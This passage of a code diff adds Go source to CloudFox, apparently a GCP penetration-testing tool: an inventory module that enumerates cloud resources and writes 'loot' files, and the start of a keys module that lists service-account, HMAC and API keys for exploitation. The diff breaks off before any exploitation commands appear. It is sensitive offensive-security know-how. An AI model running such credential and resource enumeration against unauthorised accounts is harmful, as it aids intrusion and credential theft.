+func (m *InventoryModule) enumCloudBuild(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudbuildservice.New() + triggers, err := svc.ListTriggers(projectID) + if err != nil { + return + } + + for _, trigger := range triggers { + region := "global" + m.addResource(projectID, "Cloud Build Triggers", region, fmt.Sprintf("projects/%s/locations/%s/triggers/%s", projectID, region, trigger.Name)) + } +} + +func (m *InventoryModule) enumSourceRepos(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := sourcereposservice.New() + repos, err := svc.ListRepos(projectID) + if err != nil { + return + } + + for _, repo := range repos { + m.addResource(projectID, "Source Repositories", "global", fmt.Sprintf("projects/%s/repos/%s", projectID, repo.Name)) + } +} + +func (m *InventoryModule) enumArtifactRegistry(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc, err := artifactregistryservice.NewWithSession(nil) + if err != nil { + return + } + repos, err := svc.Repositories(projectID) + if err != nil { + return + } + + for _, repo := range repos { + m.addResource(projectID, "Artifact Registries", repo.Location, fmt.Sprintf("projects/%s/locations/%s/repositories/%s", projectID, repo.Location, repo.Name)) + } +} + +func (m *InventoryModule) enumDataflow(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := dataflowservice.New() + jobs, err := svc.ListJobs(projectID) + if err != nil { + return + } + + for _, job := range jobs { + m.addResource(projectID, "Dataflow Jobs", job.Location, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Location, job.ID)) + } +} + +func (m *InventoryModule) enumDataproc(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := dataprocservice.New() + clusters, err := svc.ListClusters(projectID) + if err != nil { + return + } + + for _, cluster := range clusters { + m.addResource(projectID, "Dataproc Clusters", cluster.Region, fmt.Sprintf("projects/%s/regions/%s/clusters/%s", projectID, cluster.Region, cluster.Name)) + } +} + +func (m *InventoryModule) enumNotebooks(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := notebooksservice.New() + instances, err := svc.ListInstances(projectID) + if err != nil { + return + } + + for _, inst := range instances { + m.addResource(projectID, "Notebook Instances", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) + } +} + +func (m *InventoryModule) enumComposer(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := composerservice.New() + envs, err := svc.ListEnvironments(projectID) + if err != nil { + return + } + + for _, env := range envs { + m.addResource(projectID, "Composer Environments", env.Location, fmt.Sprintf("projects/%s/locations/%s/environments/%s", projectID, env.Location, env.Name)) + } +} + +func (m *InventoryModule) enumScheduler(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := schedulerservice.New() + jobs, err := svc.Jobs(projectID) + if err != nil { + return + } + + for _, job := range jobs { + m.addResource(projectID, "Scheduler Jobs", job.Location, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Location, job.Name)) + } +} + +func (m *InventoryModule) enumLoggingSinks(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := loggingservice.New() + sinks, err := svc.Sinks(projectID) + if err != nil { + return + } + + for _, sink := range sinks { + m.addResource(projectID, "Log Sinks", "global", fmt.Sprintf("projects/%s/sinks/%s", projectID, sink.Name)) + } +} + +func (m *InventoryModule) enumCloudArmor(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := cloudarmorservice.New() + policies, err := svc.GetSecurityPolicies(projectID) + if err != nil { + return + } + + for _, policy := range policies { + m.addResource(projectID, "Cloud Armor Policies", "global", fmt.Sprintf("projects/%s/global/securityPolicies/%s", projectID, policy.Name)) + } +} + +func (m *InventoryModule) enumSSLCertificates(ctx context.Context, projectID string, wg *sync.WaitGroup, sem chan struct{}) { + defer wg.Done() + sem <- struct{}{} + defer func() { <-sem }() + + svc := certmanagerservice.New() + certs, err := svc.GetCertificates(projectID) + if err != nil { + return + } + + for _, cert := range certs { + m.addResource(projectID, "SSL Certificates", cert.Location, fmt.Sprintf("projects/%s/locations/%s/certificates/%s", projectID, cert.Location, cert.Name)) + } +} + +// addResource safely adds a resource count for a specific project +func (m *InventoryModule) addResource(projectID, resourceType, region, resourceID string) { + m.mu.Lock() + defer m.mu.Unlock() + + // Normalize region + if region == "" { + region = "global" + } + region = strings.ToLower(region) + + // Track region for this project + if m.projectRegions[projectID] == nil { + m.projectRegions[projectID] = make(map[string]bool) + } + m.projectRegions[projectID][region] = true + + // Increment count + if m.projectResourceCounts[projectID] == nil { + m.projectResourceCounts[projectID] = make(map[string]map[string]int) + } + if m.projectResourceCounts[projectID][resourceType] == nil { + m.projectResourceCounts[projectID][resourceType] = make(map[string]int) + } + m.projectResourceCounts[projectID][resourceType][region]++ + + // Track resource ID + if m.projectResourceIDs[projectID] == nil { + m.projectResourceIDs[projectID] = make(map[string]map[string][]string) + } + if m.projectResourceIDs[projectID][resourceType] == nil { + m.projectResourceIDs[projectID][resourceType] = make(map[string][]string) + } + m.projectResourceIDs[projectID][resourceType][region] = append(m.projectResourceIDs[projectID][resourceType][region], resourceID) +} + +// calculateTotals computes the total counts per project and globally +func (m *InventoryModule) calculateTotals() { + for projectID, resourceCounts := range m.projectResourceCounts { + if m.projectTotalByType[projectID] == nil { + m.projectTotalByType[projectID] = make(map[string]int) + } + if m.projectTotalByRegion[projectID] == nil { + m.projectTotalByRegion[projectID] = make(map[string]int) + } + + for resourceType, regionCounts := range resourceCounts { + for region, count := range regionCounts { + m.projectTotalByType[projectID][resourceType] += count + m.projectTotalByRegion[projectID][region] += count + m.projectGrandTotal[projectID] += count + m.grandTotal += count + } + } + } +} + +// collectAssetInventory queries Cloud Asset Inventory API for complete resource counts +func (m *InventoryModule) collectAssetInventory(ctx context.Context, logger internal.Logger) { + svc := assetservice.New() + + for _, projectID := range m.ProjectIDs { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Querying asset inventory for project: %s", projectID), GCP_INVENTORY_MODULE_NAME) + } + + counts, err := svc.GetAssetTypeCounts(projectID) + if err != nil { + m.mu.Lock() + m.assetAPIFailedProjs = append(m.assetAPIFailedProjs, projectID) + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not query asset inventory for project %s (API may not be enabled)", projectID)) + } + continue + } + + m.mu.Lock() + m.assetAPIEnabled = true // At least one project succeeded + if m.assetCounts[projectID] == nil { + m.assetCounts[projectID] = make(map[string]int) + } + for _, c := range counts { + m.assetCounts[projectID][c.AssetType] = c.Count + m.assetGrandTotal += c.Count + } + m.mu.Unlock() + } + + // Show warning if Asset API failed for some/all projects + if len(m.assetAPIFailedProjs) > 0 { + if !m.assetAPIEnabled { + logger.InfoM("WARNING: Cloud Asset Inventory API not enabled in any project.", GCP_INVENTORY_MODULE_NAME) + logger.InfoM("To enable complete resource coverage, enable the Cloud Asset API:", GCP_INVENTORY_MODULE_NAME) + logger.InfoM(" gcloud services enable cloudasset.googleapis.com --project=", GCP_INVENTORY_MODULE_NAME) + } else { + logger.InfoM(fmt.Sprintf("WARNING: Cloud Asset Inventory API failed for %d project(s): %s", + len(m.assetAPIFailedProjs), strings.Join(m.assetAPIFailedProjs, ", ")), GCP_INVENTORY_MODULE_NAME) + logger.InfoM("These projects will only show CloudFox enumerated resources (potential blind spots)", GCP_INVENTORY_MODULE_NAME) + } + } +} + +// collectEnabledServices queries Service Usage API to find enabled services +// This is a fallback when Asset Inventory API is not available +func (m *InventoryModule) collectEnabledServices(ctx context.Context, logger internal.Logger) { + svc, err := serviceusage.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not create Service Usage client: %v", err), GCP_INVENTORY_MODULE_NAME) + } + return + } + + for _, projectID := range m.ProjectIDs { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Querying enabled services for project: %s", projectID), GCP_INVENTORY_MODULE_NAME) + } + + parent := fmt.Sprintf("projects/%s", projectID) + var enabledServices []string + + req := svc.Services.List(parent).Filter("state:ENABLED") + err := req.Pages(ctx, func(page *serviceusage.ListServicesResponse) error { + for _, service := range page.Services { + // Extract service name from full path + // Format: projects/123/services/compute.googleapis.com + parts := strings.Split(service.Name, "/") + serviceName := parts[len(parts)-1] + enabledServices = append(enabledServices, serviceName) + } + return nil + }) + + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not query enabled services for project %s", projectID)) + } + continue + } + + m.mu.Lock() + m.enabledServices[projectID] = enabledServices + m.mu.Unlock() + } +} + +// getInterestingServices filters enabled services to show only those that likely contain resources +func getInterestingServices(services []string) []string { + // Services that typically contain enumerable resources + interestingPrefixes := []string{ + "compute.googleapis.com", + "container.googleapis.com", + "run.googleapis.com", + "cloudfunctions.googleapis.com", + "storage.googleapis.com", + "bigquery.googleapis.com", + "sqladmin.googleapis.com", + "spanner.googleapis.com", + "bigtable.googleapis.com", + "redis.googleapis.com", + "file.googleapis.com", + "secretmanager.googleapis.com", + "cloudkms.googleapis.com", + "pubsub.googleapis.com", + "cloudbuild.googleapis.com", + "sourcerepo.googleapis.com", + "artifactregistry.googleapis.com", + "dataflow.googleapis.com", + "dataproc.googleapis.com", + "notebooks.googleapis.com", + "composer.googleapis.com", + "dns.googleapis.com", + "apikeys.googleapis.com", + "cloudscheduler.googleapis.com", + "logging.googleapis.com", + "aiplatform.googleapis.com", + "ml.googleapis.com", + "healthcare.googleapis.com", + "firestore.googleapis.com", + "appengine.googleapis.com", + } + + var interesting []string + for _, svc := range services { + for _, prefix := range interestingPrefixes { + if svc == prefix { + interesting = append(interesting, svc) + break + } + } + } + return interesting +} + +// isServiceCoveredByCloudFox checks if CloudFox has dedicated enumeration for a service +func isServiceCoveredByCloudFox(serviceName string) bool { + coveredServices := map[string]bool{ + "compute.googleapis.com": true, + "container.googleapis.com": true, + "run.googleapis.com": true, + "cloudfunctions.googleapis.com": true, + "storage.googleapis.com": true, + "bigquery.googleapis.com": true, + "sqladmin.googleapis.com": true, + "spanner.googleapis.com": true, + "bigtableadmin.googleapis.com": true, + "redis.googleapis.com": true, + "file.googleapis.com": true, + "secretmanager.googleapis.com": true, + "cloudkms.googleapis.com": true, + "pubsub.googleapis.com": true, + "cloudbuild.googleapis.com": true, + "sourcerepo.googleapis.com": true, + "artifactregistry.googleapis.com": true, + "dataflow.googleapis.com": true, + "dataproc.googleapis.com": true, + "notebooks.googleapis.com": true, + "composer.googleapis.com": true, + "dns.googleapis.com": true, + "apikeys.googleapis.com": true, + "cloudscheduler.googleapis.com": true, + "logging.googleapis.com": true, + "iam.googleapis.com": true, + } + return coveredServices[serviceName] +} + +// isInterestingService checks if a service typically contains enumerable resources +func isInterestingService(serviceName string) bool { + interestingServices := map[string]bool{ + "compute.googleapis.com": true, + "container.googleapis.com": true, + "run.googleapis.com": true, + "cloudfunctions.googleapis.com": true, + "storage.googleapis.com": true, + "storage-component.googleapis.com": true, + "bigquery.googleapis.com": true, + "sqladmin.googleapis.com": true, + "spanner.googleapis.com": true, + "bigtableadmin.googleapis.com": true, + "redis.googleapis.com": true, + "file.googleapis.com": true, + "secretmanager.googleapis.com": true, + "cloudkms.googleapis.com": true, + "pubsub.googleapis.com": true, + "cloudbuild.googleapis.com": true, + "sourcerepo.googleapis.com": true, + "artifactregistry.googleapis.com": true, + "containerregistry.googleapis.com": true, + "dataflow.googleapis.com": true, + "dataproc.googleapis.com": true, + "notebooks.googleapis.com": true, + "composer.googleapis.com": true, + "dns.googleapis.com": true, + "apikeys.googleapis.com": true, + "cloudscheduler.googleapis.com": true, + "logging.googleapis.com": true, + "iam.googleapis.com": true, + "aiplatform.googleapis.com": true, + "ml.googleapis.com": true, + "healthcare.googleapis.com": true, + "firestore.googleapis.com": true, + "appengine.googleapis.com": true, + "vpcaccess.googleapis.com": true, + "servicenetworking.googleapis.com": true, + "memcache.googleapis.com": true, + "documentai.googleapis.com": true, + "dialogflow.googleapis.com": true, + "translate.googleapis.com": true, + "vision.googleapis.com": true, + "speech.googleapis.com": true, + "texttospeech.googleapis.com": true, + "videointelligence.googleapis.com": true, + "automl.googleapis.com": true, + "datacatalog.googleapis.com": true, + "dataplex.googleapis.com": true, + "datastream.googleapis.com": true, + "eventarc.googleapis.com": true, + "workflows.googleapis.com": true, + "gameservices.googleapis.com": true, + } + return interestingServices[serviceName] +} + +// getServiceDescription returns a human-readable description of a GCP service +func getServiceDescription(serviceName string) string { + descriptions := map[string]string{ + "compute.googleapis.com": "VMs, Disks, Networks, Firewalls", + "container.googleapis.com": "GKE Clusters", + "run.googleapis.com": "Cloud Run Services/Jobs", + "cloudfunctions.googleapis.com": "Cloud Functions", + "storage.googleapis.com": "Cloud Storage Buckets", + "bigquery.googleapis.com": "BigQuery Datasets/Tables", + "sqladmin.googleapis.com": "Cloud SQL Instances", + "spanner.googleapis.com": "Spanner Instances", + "bigtableadmin.googleapis.com": "Bigtable Instances", + "redis.googleapis.com": "Memorystore Redis", + "file.googleapis.com": "Filestore Instances", + "secretmanager.googleapis.com": "Secret Manager Secrets", + "cloudkms.googleapis.com": "KMS Keys", + "pubsub.googleapis.com": "Pub/Sub Topics/Subscriptions", + "cloudbuild.googleapis.com": "Cloud Build Triggers", + "sourcerepo.googleapis.com": "Source Repositories", + "artifactregistry.googleapis.com": "Artifact Registry Repos", + "containerregistry.googleapis.com": "Container Registry (gcr.io)", + "dataflow.googleapis.com": "Dataflow Jobs", + "dataproc.googleapis.com": "Dataproc Clusters", + "notebooks.googleapis.com": "AI Notebooks", + "composer.googleapis.com": "Cloud Composer (Airflow)", + "dns.googleapis.com": "Cloud DNS Zones", + "apikeys.googleapis.com": "API Keys", + "cloudscheduler.googleapis.com": "Cloud Scheduler Jobs", + "logging.googleapis.com": "Cloud Logging", + "iam.googleapis.com": "IAM Service Accounts", + "aiplatform.googleapis.com": "Vertex AI Resources", + "ml.googleapis.com": "AI Platform Models", + "healthcare.googleapis.com": "Healthcare API Datasets", + "firestore.googleapis.com": "Firestore Databases", + "appengine.googleapis.com": "App Engine Services", + "vpcaccess.googleapis.com": "VPC Access Connectors", + "memcache.googleapis.com": "Memorystore Memcached", + "documentai.googleapis.com": "Document AI Processors", + "dialogflow.googleapis.com": "Dialogflow Agents", + "datacatalog.googleapis.com": "Data Catalog Entries", + "dataplex.googleapis.com": "Dataplex Lakes", + "datastream.googleapis.com": "Datastream Streams", + "eventarc.googleapis.com": "Eventarc Triggers", + "workflows.googleapis.com": "Cloud Workflows", + } + if desc, ok := descriptions[serviceName]; ok { + return desc + } + return "May contain resources" +} + +// countAssetTypes returns the number of unique asset types found +func (m *InventoryModule) countAssetTypes() int { + types := make(map[string]bool) + for _, projectCounts := range m.assetCounts { + for assetType := range projectCounts { + types[assetType] = true + } + } + return len(types) +} + +// getAssetTypeTotals aggregates asset counts across all projects +func (m *InventoryModule) getAssetTypeTotals() map[string]int { + totals := make(map[string]int) + for _, projectCounts := range m.assetCounts { + for assetType, count := range projectCounts { + totals[assetType] += count + } + } + return totals +} + +// isCoveredAssetType checks if CloudFox has dedicated enumeration for an asset type +func isCoveredAssetType(assetType string) bool { + coveredTypes := map[string]bool{ + "compute.googleapis.com/Instance": true, + "compute.googleapis.com/Disk": true, + "compute.googleapis.com/Snapshot": true, + "compute.googleapis.com/Image": true, + "container.googleapis.com/Cluster": true, + "run.googleapis.com/Service": true, + "run.googleapis.com/Job": true, + "cloudfunctions.googleapis.com/Function": true, + "storage.googleapis.com/Bucket": true, + "bigquery.googleapis.com/Dataset": true, + "sqladmin.googleapis.com/Instance": true, + "spanner.googleapis.com/Instance": true, + "bigtableadmin.googleapis.com/Instance": true, + "redis.googleapis.com/Instance": true, + "file.googleapis.com/Instance": true, + "iam.googleapis.com/ServiceAccount": true, + "cloudkms.googleapis.com/KeyRing": true, + "secretmanager.googleapis.com/Secret": true, + "apikeys.googleapis.com/Key": true, + "pubsub.googleapis.com/Topic": true, + "pubsub.googleapis.com/Subscription": true, + "dns.googleapis.com/ManagedZone": true, + "cloudbuild.googleapis.com/BuildTrigger": true, + "sourcerepo.googleapis.com/Repo": true, + "artifactregistry.googleapis.com/Repository": true, + "dataflow.googleapis.com/Job": true, + "dataproc.googleapis.com/Cluster": true, + "notebooks.googleapis.com/Instance": true, + "composer.googleapis.com/Environment": true, + "cloudscheduler.googleapis.com/Job": true, + "logging.googleapis.com/LogSink": true, + "compute.googleapis.com/SecurityPolicy": true, + "certificatemanager.googleapis.com/Certificate": true, + } + return coveredTypes[assetType] +} + +// formatAssetType converts GCP asset type to human-readable name +func formatAssetType(assetType string) string { + // Split by / and take the last part + parts := strings.Split(assetType, "/") + if len(parts) >= 2 { + service := strings.TrimSuffix(parts[0], ".googleapis.com") + resource := parts[len(parts)-1] + return fmt.Sprintf("%s/%s", service, resource) + } + return assetType +} + +// Helper function to extract region from zone (e.g., us-central1-a -> us-central1) +func extractRegionFromZone(zone string) string { + parts := strings.Split(zone, "-") + if len(parts) >= 3 { + return strings.Join(parts[:len(parts)-1], "-") + } + return zone +} + +// writeOutput generates the table and loot files per-project +func (m *InventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Build hierarchical output data with per-project results + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Generate output for each project + for _, projectID := range m.ProjectIDs { + projectOutput := m.buildProjectOutput(projectID) + if projectOutput != nil { + outputData.ProjectLevelData[projectID] = projectOutput + } + } + + // Use hierarchical output to write to per-project directories + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_INVENTORY_MODULE_NAME) + } +} + +// buildProjectOutput generates output data for a single project +func (m *InventoryModule) buildProjectOutput(projectID string) internal.CloudfoxOutput { + var tableFiles []internal.TableFile + + // Get project-specific asset counts + projectAssets := m.assetCounts[projectID] + projectAssetTotal := 0 + for _, count := range projectAssets { + projectAssetTotal += count + } + + // Get project-specific detailed resource counts + projectResourceTotal := m.projectGrandTotal[projectID] + + // ======================================== + // Table 1: Complete Asset Inventory (from Cloud Asset API) + // ======================================== + if projectAssetTotal > 0 { + // Sort asset types by count (descending) + var assetTypes []string + for at := range projectAssets { + assetTypes = append(assetTypes, at) + } + sort.Slice(assetTypes, func(i, j int) bool { + return projectAssets[assetTypes[i]] > projectAssets[assetTypes[j]] + }) + + assetHeader := []string{"Asset Type", "Count", "CloudFox Coverage"} + var assetBody [][]string + + // Add total row + assetBody = append(assetBody, []string{"TOTAL", strconv.Itoa(projectAssetTotal), "-"}) + + // Add uncovered assets first (these are areas CloudFox might miss) + var uncoveredTypes []string + var coveredTypes []string + for _, at := range assetTypes { + if isCoveredAssetType(at) { + coveredTypes = append(coveredTypes, at) + } else { + uncoveredTypes = append(uncoveredTypes, at) + } + } + + // Uncovered types first (potential blind spots) + for _, at := range uncoveredTypes { + coverage := "NO - potential blind spot" + assetBody = append(assetBody, []string{ + formatAssetType(at), + strconv.Itoa(projectAssets[at]), + coverage, + }) + } + + // Then covered types + for _, at := range coveredTypes { + coverage := "Yes" + assetBody = append(assetBody, []string{ + formatAssetType(at), + strconv.Itoa(projectAssets[at]), + coverage, + }) + } + + tableFiles = append(tableFiles, internal.TableFile{ + Name: "inventory-complete", + Header: assetHeader, + Body: assetBody, + }) + } else if services, ok := m.enabledServices[projectID]; ok && len(services) > 0 { + // ======================================== + // Table 1b: Enabled Services (fallback when Asset API not available) + // ======================================== + serviceHeader := []string{"Service", "CloudFox Coverage", "Description"} + var serviceBody [][]string + + // Filter to interesting services and sort + var interestingServices []string + for _, svc := range services { + if isInterestingService(svc) { + interestingServices = append(interestingServices, svc) + } + } + sort.Strings(interestingServices) + + // Add uncovered services first (potential blind spots) + var uncoveredServices []string + var coveredServices []string + for _, svc := range interestingServices { + if isServiceCoveredByCloudFox(svc) { + coveredServices = append(coveredServices, svc) + } else { + uncoveredServices = append(uncoveredServices, svc) + } + } + + for _, svc := range uncoveredServices { + coverage := "NO - potential blind spot" + desc := getServiceDescription(svc) + serviceBody = append(serviceBody, []string{svc, coverage, desc}) + } + + for _, svc := range coveredServices { + coverage := "Yes" + desc := getServiceDescription(svc) + serviceBody = append(serviceBody, []string{svc, coverage, desc}) + } + + if len(serviceBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "inventory-enabled-services", + Header: serviceHeader, + Body: serviceBody, + }) + } + } + + // ======================================== + // Table 2: Detailed Enumeration by Region (from dedicated CloudFox modules) + // Now uses per-project resource tracking + // ======================================== + if projectResourceTotal > 0 { + sortedRegions := m.getSortedRegionsForProject(projectID) + + // Build header: Resource Type, then regions + header := []string{"Resource Type"} + header = append(header, sortedRegions...) + header = append(header, "Total") + + // Build body + var body [][]string + + // Add total row first + totalRow := []string{"TOTAL"} + for _, region := range sortedRegions { + totalRow = append(totalRow, strconv.Itoa(m.projectTotalByRegion[projectID][region])) + } + totalRow = append(totalRow, strconv.Itoa(projectResourceTotal)) + body = append(body, totalRow) + + // Sort resource types alphabetically + var resourceTypes []string + for rt := range m.projectTotalByType[projectID] { + resourceTypes = append(resourceTypes, rt) + } + sort.Strings(resourceTypes) + + // Add row for each resource type (only if it has resources) + for _, resourceType := range resourceTypes { + if m.projectTotalByType[projectID][resourceType] == 0 { + continue + } + + row := []string{resourceType} + for _, region := range sortedRegions { + count := m.projectResourceCounts[projectID][resourceType][region] + if count > 0 { + row = append(row, strconv.Itoa(count)) + } else { + row = append(row, "-") + } + } + row = append(row, strconv.Itoa(m.projectTotalByType[projectID][resourceType])) + body = append(body, row) + } + + tableFiles = append(tableFiles, internal.TableFile{ + Name: "inventory-detailed", + Header: header, + Body: body, + }) + } + + // ======================================== + // Loot file: All resource identifiers + // ======================================== + var lootContent strings.Builder + lootContent.WriteString("# GCP Resource Inventory\n") + lootContent.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + lootContent.WriteString("# Generated by CloudFox\n") + lootContent.WriteString(fmt.Sprintf("# Total resources (Asset Inventory): %d\n", projectAssetTotal)) + lootContent.WriteString(fmt.Sprintf("# Total resources (Detailed): %d\n\n", projectResourceTotal)) + + // Sort resource types + var resourceTypes []string + for rt := range m.projectTotalByType[projectID] { + resourceTypes = append(resourceTypes, rt) + } + sort.Strings(resourceTypes) + + sortedRegions := m.getSortedRegionsForProject(projectID) + for _, resourceType := range resourceTypes { + if m.projectTotalByType[projectID][resourceType] == 0 { + continue + } + lootContent.WriteString(fmt.Sprintf("## %s (%d)\n", resourceType, m.projectTotalByType[projectID][resourceType])) + for _, region := range sortedRegions { + if m.projectResourceIDs[projectID] != nil && m.projectResourceIDs[projectID][resourceType] != nil { + for _, resourceID := range m.projectResourceIDs[projectID][resourceType][region] { + lootContent.WriteString(fmt.Sprintf("%s\n", resourceID)) + } + } + } + lootContent.WriteString("\n") + } + + lootFiles := []internal.LootFile{{ + Name: "inventory-resources", + Contents: lootContent.String(), + }} + + // Only return output if we have data + if len(tableFiles) == 0 && lootContent.Len() == 0 { + return nil + } + + return InventoryOutput{ + Table: tableFiles, + Loot: lootFiles, + } +} + +// getSortedRegionsForProject returns regions sorted by count for a specific project, with "global" first +func (m *InventoryModule) getSortedRegionsForProject(projectID string) []string { + var regions []string + if m.projectRegions[projectID] == nil { + return regions + } + for region := range m.projectRegions[projectID] { + regions = append(regions, region) + } + + // Sort by count descending + sort.Slice(regions, func(i, j int) bool { + // Global always first + if regions[i] == "global" { + return true + } + if regions[j] == "global" { + return false + } + return m.projectTotalByRegion[projectID][regions[i]] > m.projectTotalByRegion[projectID][regions[j]] + }) + + return regions +} diff --git a/gcp/commands/keys.go b/gcp/commands/keys.go new file mode 100755 index 00000000..c234f276 --- /dev/null +++ b/gcp/commands/keys.go @@ -0,0 +1,574 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + apikeysservice "github.com/BishopFox/cloudfox/gcp/services/apikeysService" + hmacservice "github.com/BishopFox/cloudfox/gcp/services/hmacService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPKeysCommand = &cobra.Command{ + Use: globals.GCP_KEYS_MODULE_NAME, + Aliases: []string{"credentials", "creds", "access-keys"}, + Short: "Enumerate all GCP keys (SA keys, HMAC keys, API keys)", + Long: `Enumerate all types of GCP keys and credentials. + +Key Types: +- SA Keys: Service account RSA keys for OAuth 2.0 authentication +- HMAC Keys: S3-compatible access keys for Cloud Storage +- API Keys: Project-level keys for API access (Maps, Translation, etc.) + +Features: +- Unified view of all credential types +- Shows key age and expiration status +- Identifies Google-managed vs user-managed keys +- Generates exploitation commands for penetration testing`, + Run: runGCPKeysCommand, +} + +// UnifiedKeyInfo represents a key from any source +type UnifiedKeyInfo struct { + ProjectID string + KeyType string // "SA Key", "HMAC", "API Key" + KeyID string + Owner string // Email for SA/HMAC, "Project-level" for API keys + DisplayName string + Origin string // "Google Managed", "User Managed", "Service Account", "User", "-" + Algorithm string // Key algorithm (e.g., "KEY_ALG_RSA_2048") + State string // "ACTIVE", "INACTIVE", "DELETED", "DISABLED" + CreateTime time.Time + ExpireTime time.Time + Expired bool + DWDEnabled bool // For SA keys - whether the SA has Domain-Wide Delegation enabled + Restrictions string // For API keys only + KeyString string // For API keys only (if accessible) +} + +type KeysModule struct { + gcpinternal.BaseGCPModule + ProjectKeys map[string][]UnifiedKeyInfo // projectID -> keys + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type KeysOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o KeysOutput) TableFiles() []internal.TableFile { return o.Table } +func (o KeysOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPKeysCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_KEYS_MODULE_NAME) + if err != nil { + return + } + + module := &KeysModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectKeys: make(map[string][]UnifiedKeyInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *KeysModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_KEYS_MODULE_NAME, m.processProject) + + allKeys := m.getAllKeys() + if len(allKeys) == 0 { + logger.InfoM("No keys found", globals.GCP_KEYS_MODULE_NAME) + return + } + + // Count by type + saKeyCount := 0 + hmacKeyCount := 0 + apiKeyCount := 0 + userManagedCount := 0 + + for _, key := range allKeys { + switch key.KeyType { + case "SA Key": + saKeyCount++ + if key.Origin == "User Managed" { + userManagedCount++ + } + case "HMAC": + hmacKeyCount++ + case "API Key": + apiKeyCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d key(s) (%d SA keys [%d user-managed], %d HMAC keys, %d API keys)", + len(allKeys), saKeyCount, userManagedCount, hmacKeyCount, apiKeyCount), globals.GCP_KEYS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllKeys returns all keys from all projects +func (m *KeysModule) getAllKeys() []UnifiedKeyInfo { + var all []UnifiedKeyInfo + for _, keys := range m.ProjectKeys { + all = append(all, keys...) + } + return all +} + +func (m *KeysModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating keys in project: %s", projectID), globals.GCP_KEYS_MODULE_NAME) + } + + var projectKeys []UnifiedKeyInfo + + // 1. Enumerate Service Account Keys + iamService := IAMService.New() + serviceAccounts, err := iamService.ServiceAccounts(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate service accounts in project %s", projectID)) + } else { + for _, sa := range serviceAccounts { + // Check if DWD is enabled (OAuth2ClientID is set) + dwdEnabled := sa.OAuth2ClientID != "" + + for _, key := range sa.Keys { + // Extract key ID from full name + keyID := key.Name + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + + origin := "Google Managed" + if key.KeyType == "USER_MANAGED" { + origin = "User Managed" + } + + state := "ACTIVE" + if key.Disabled { + state = "DISABLED" + } + + expired := false + if !key.ValidBefore.IsZero() && 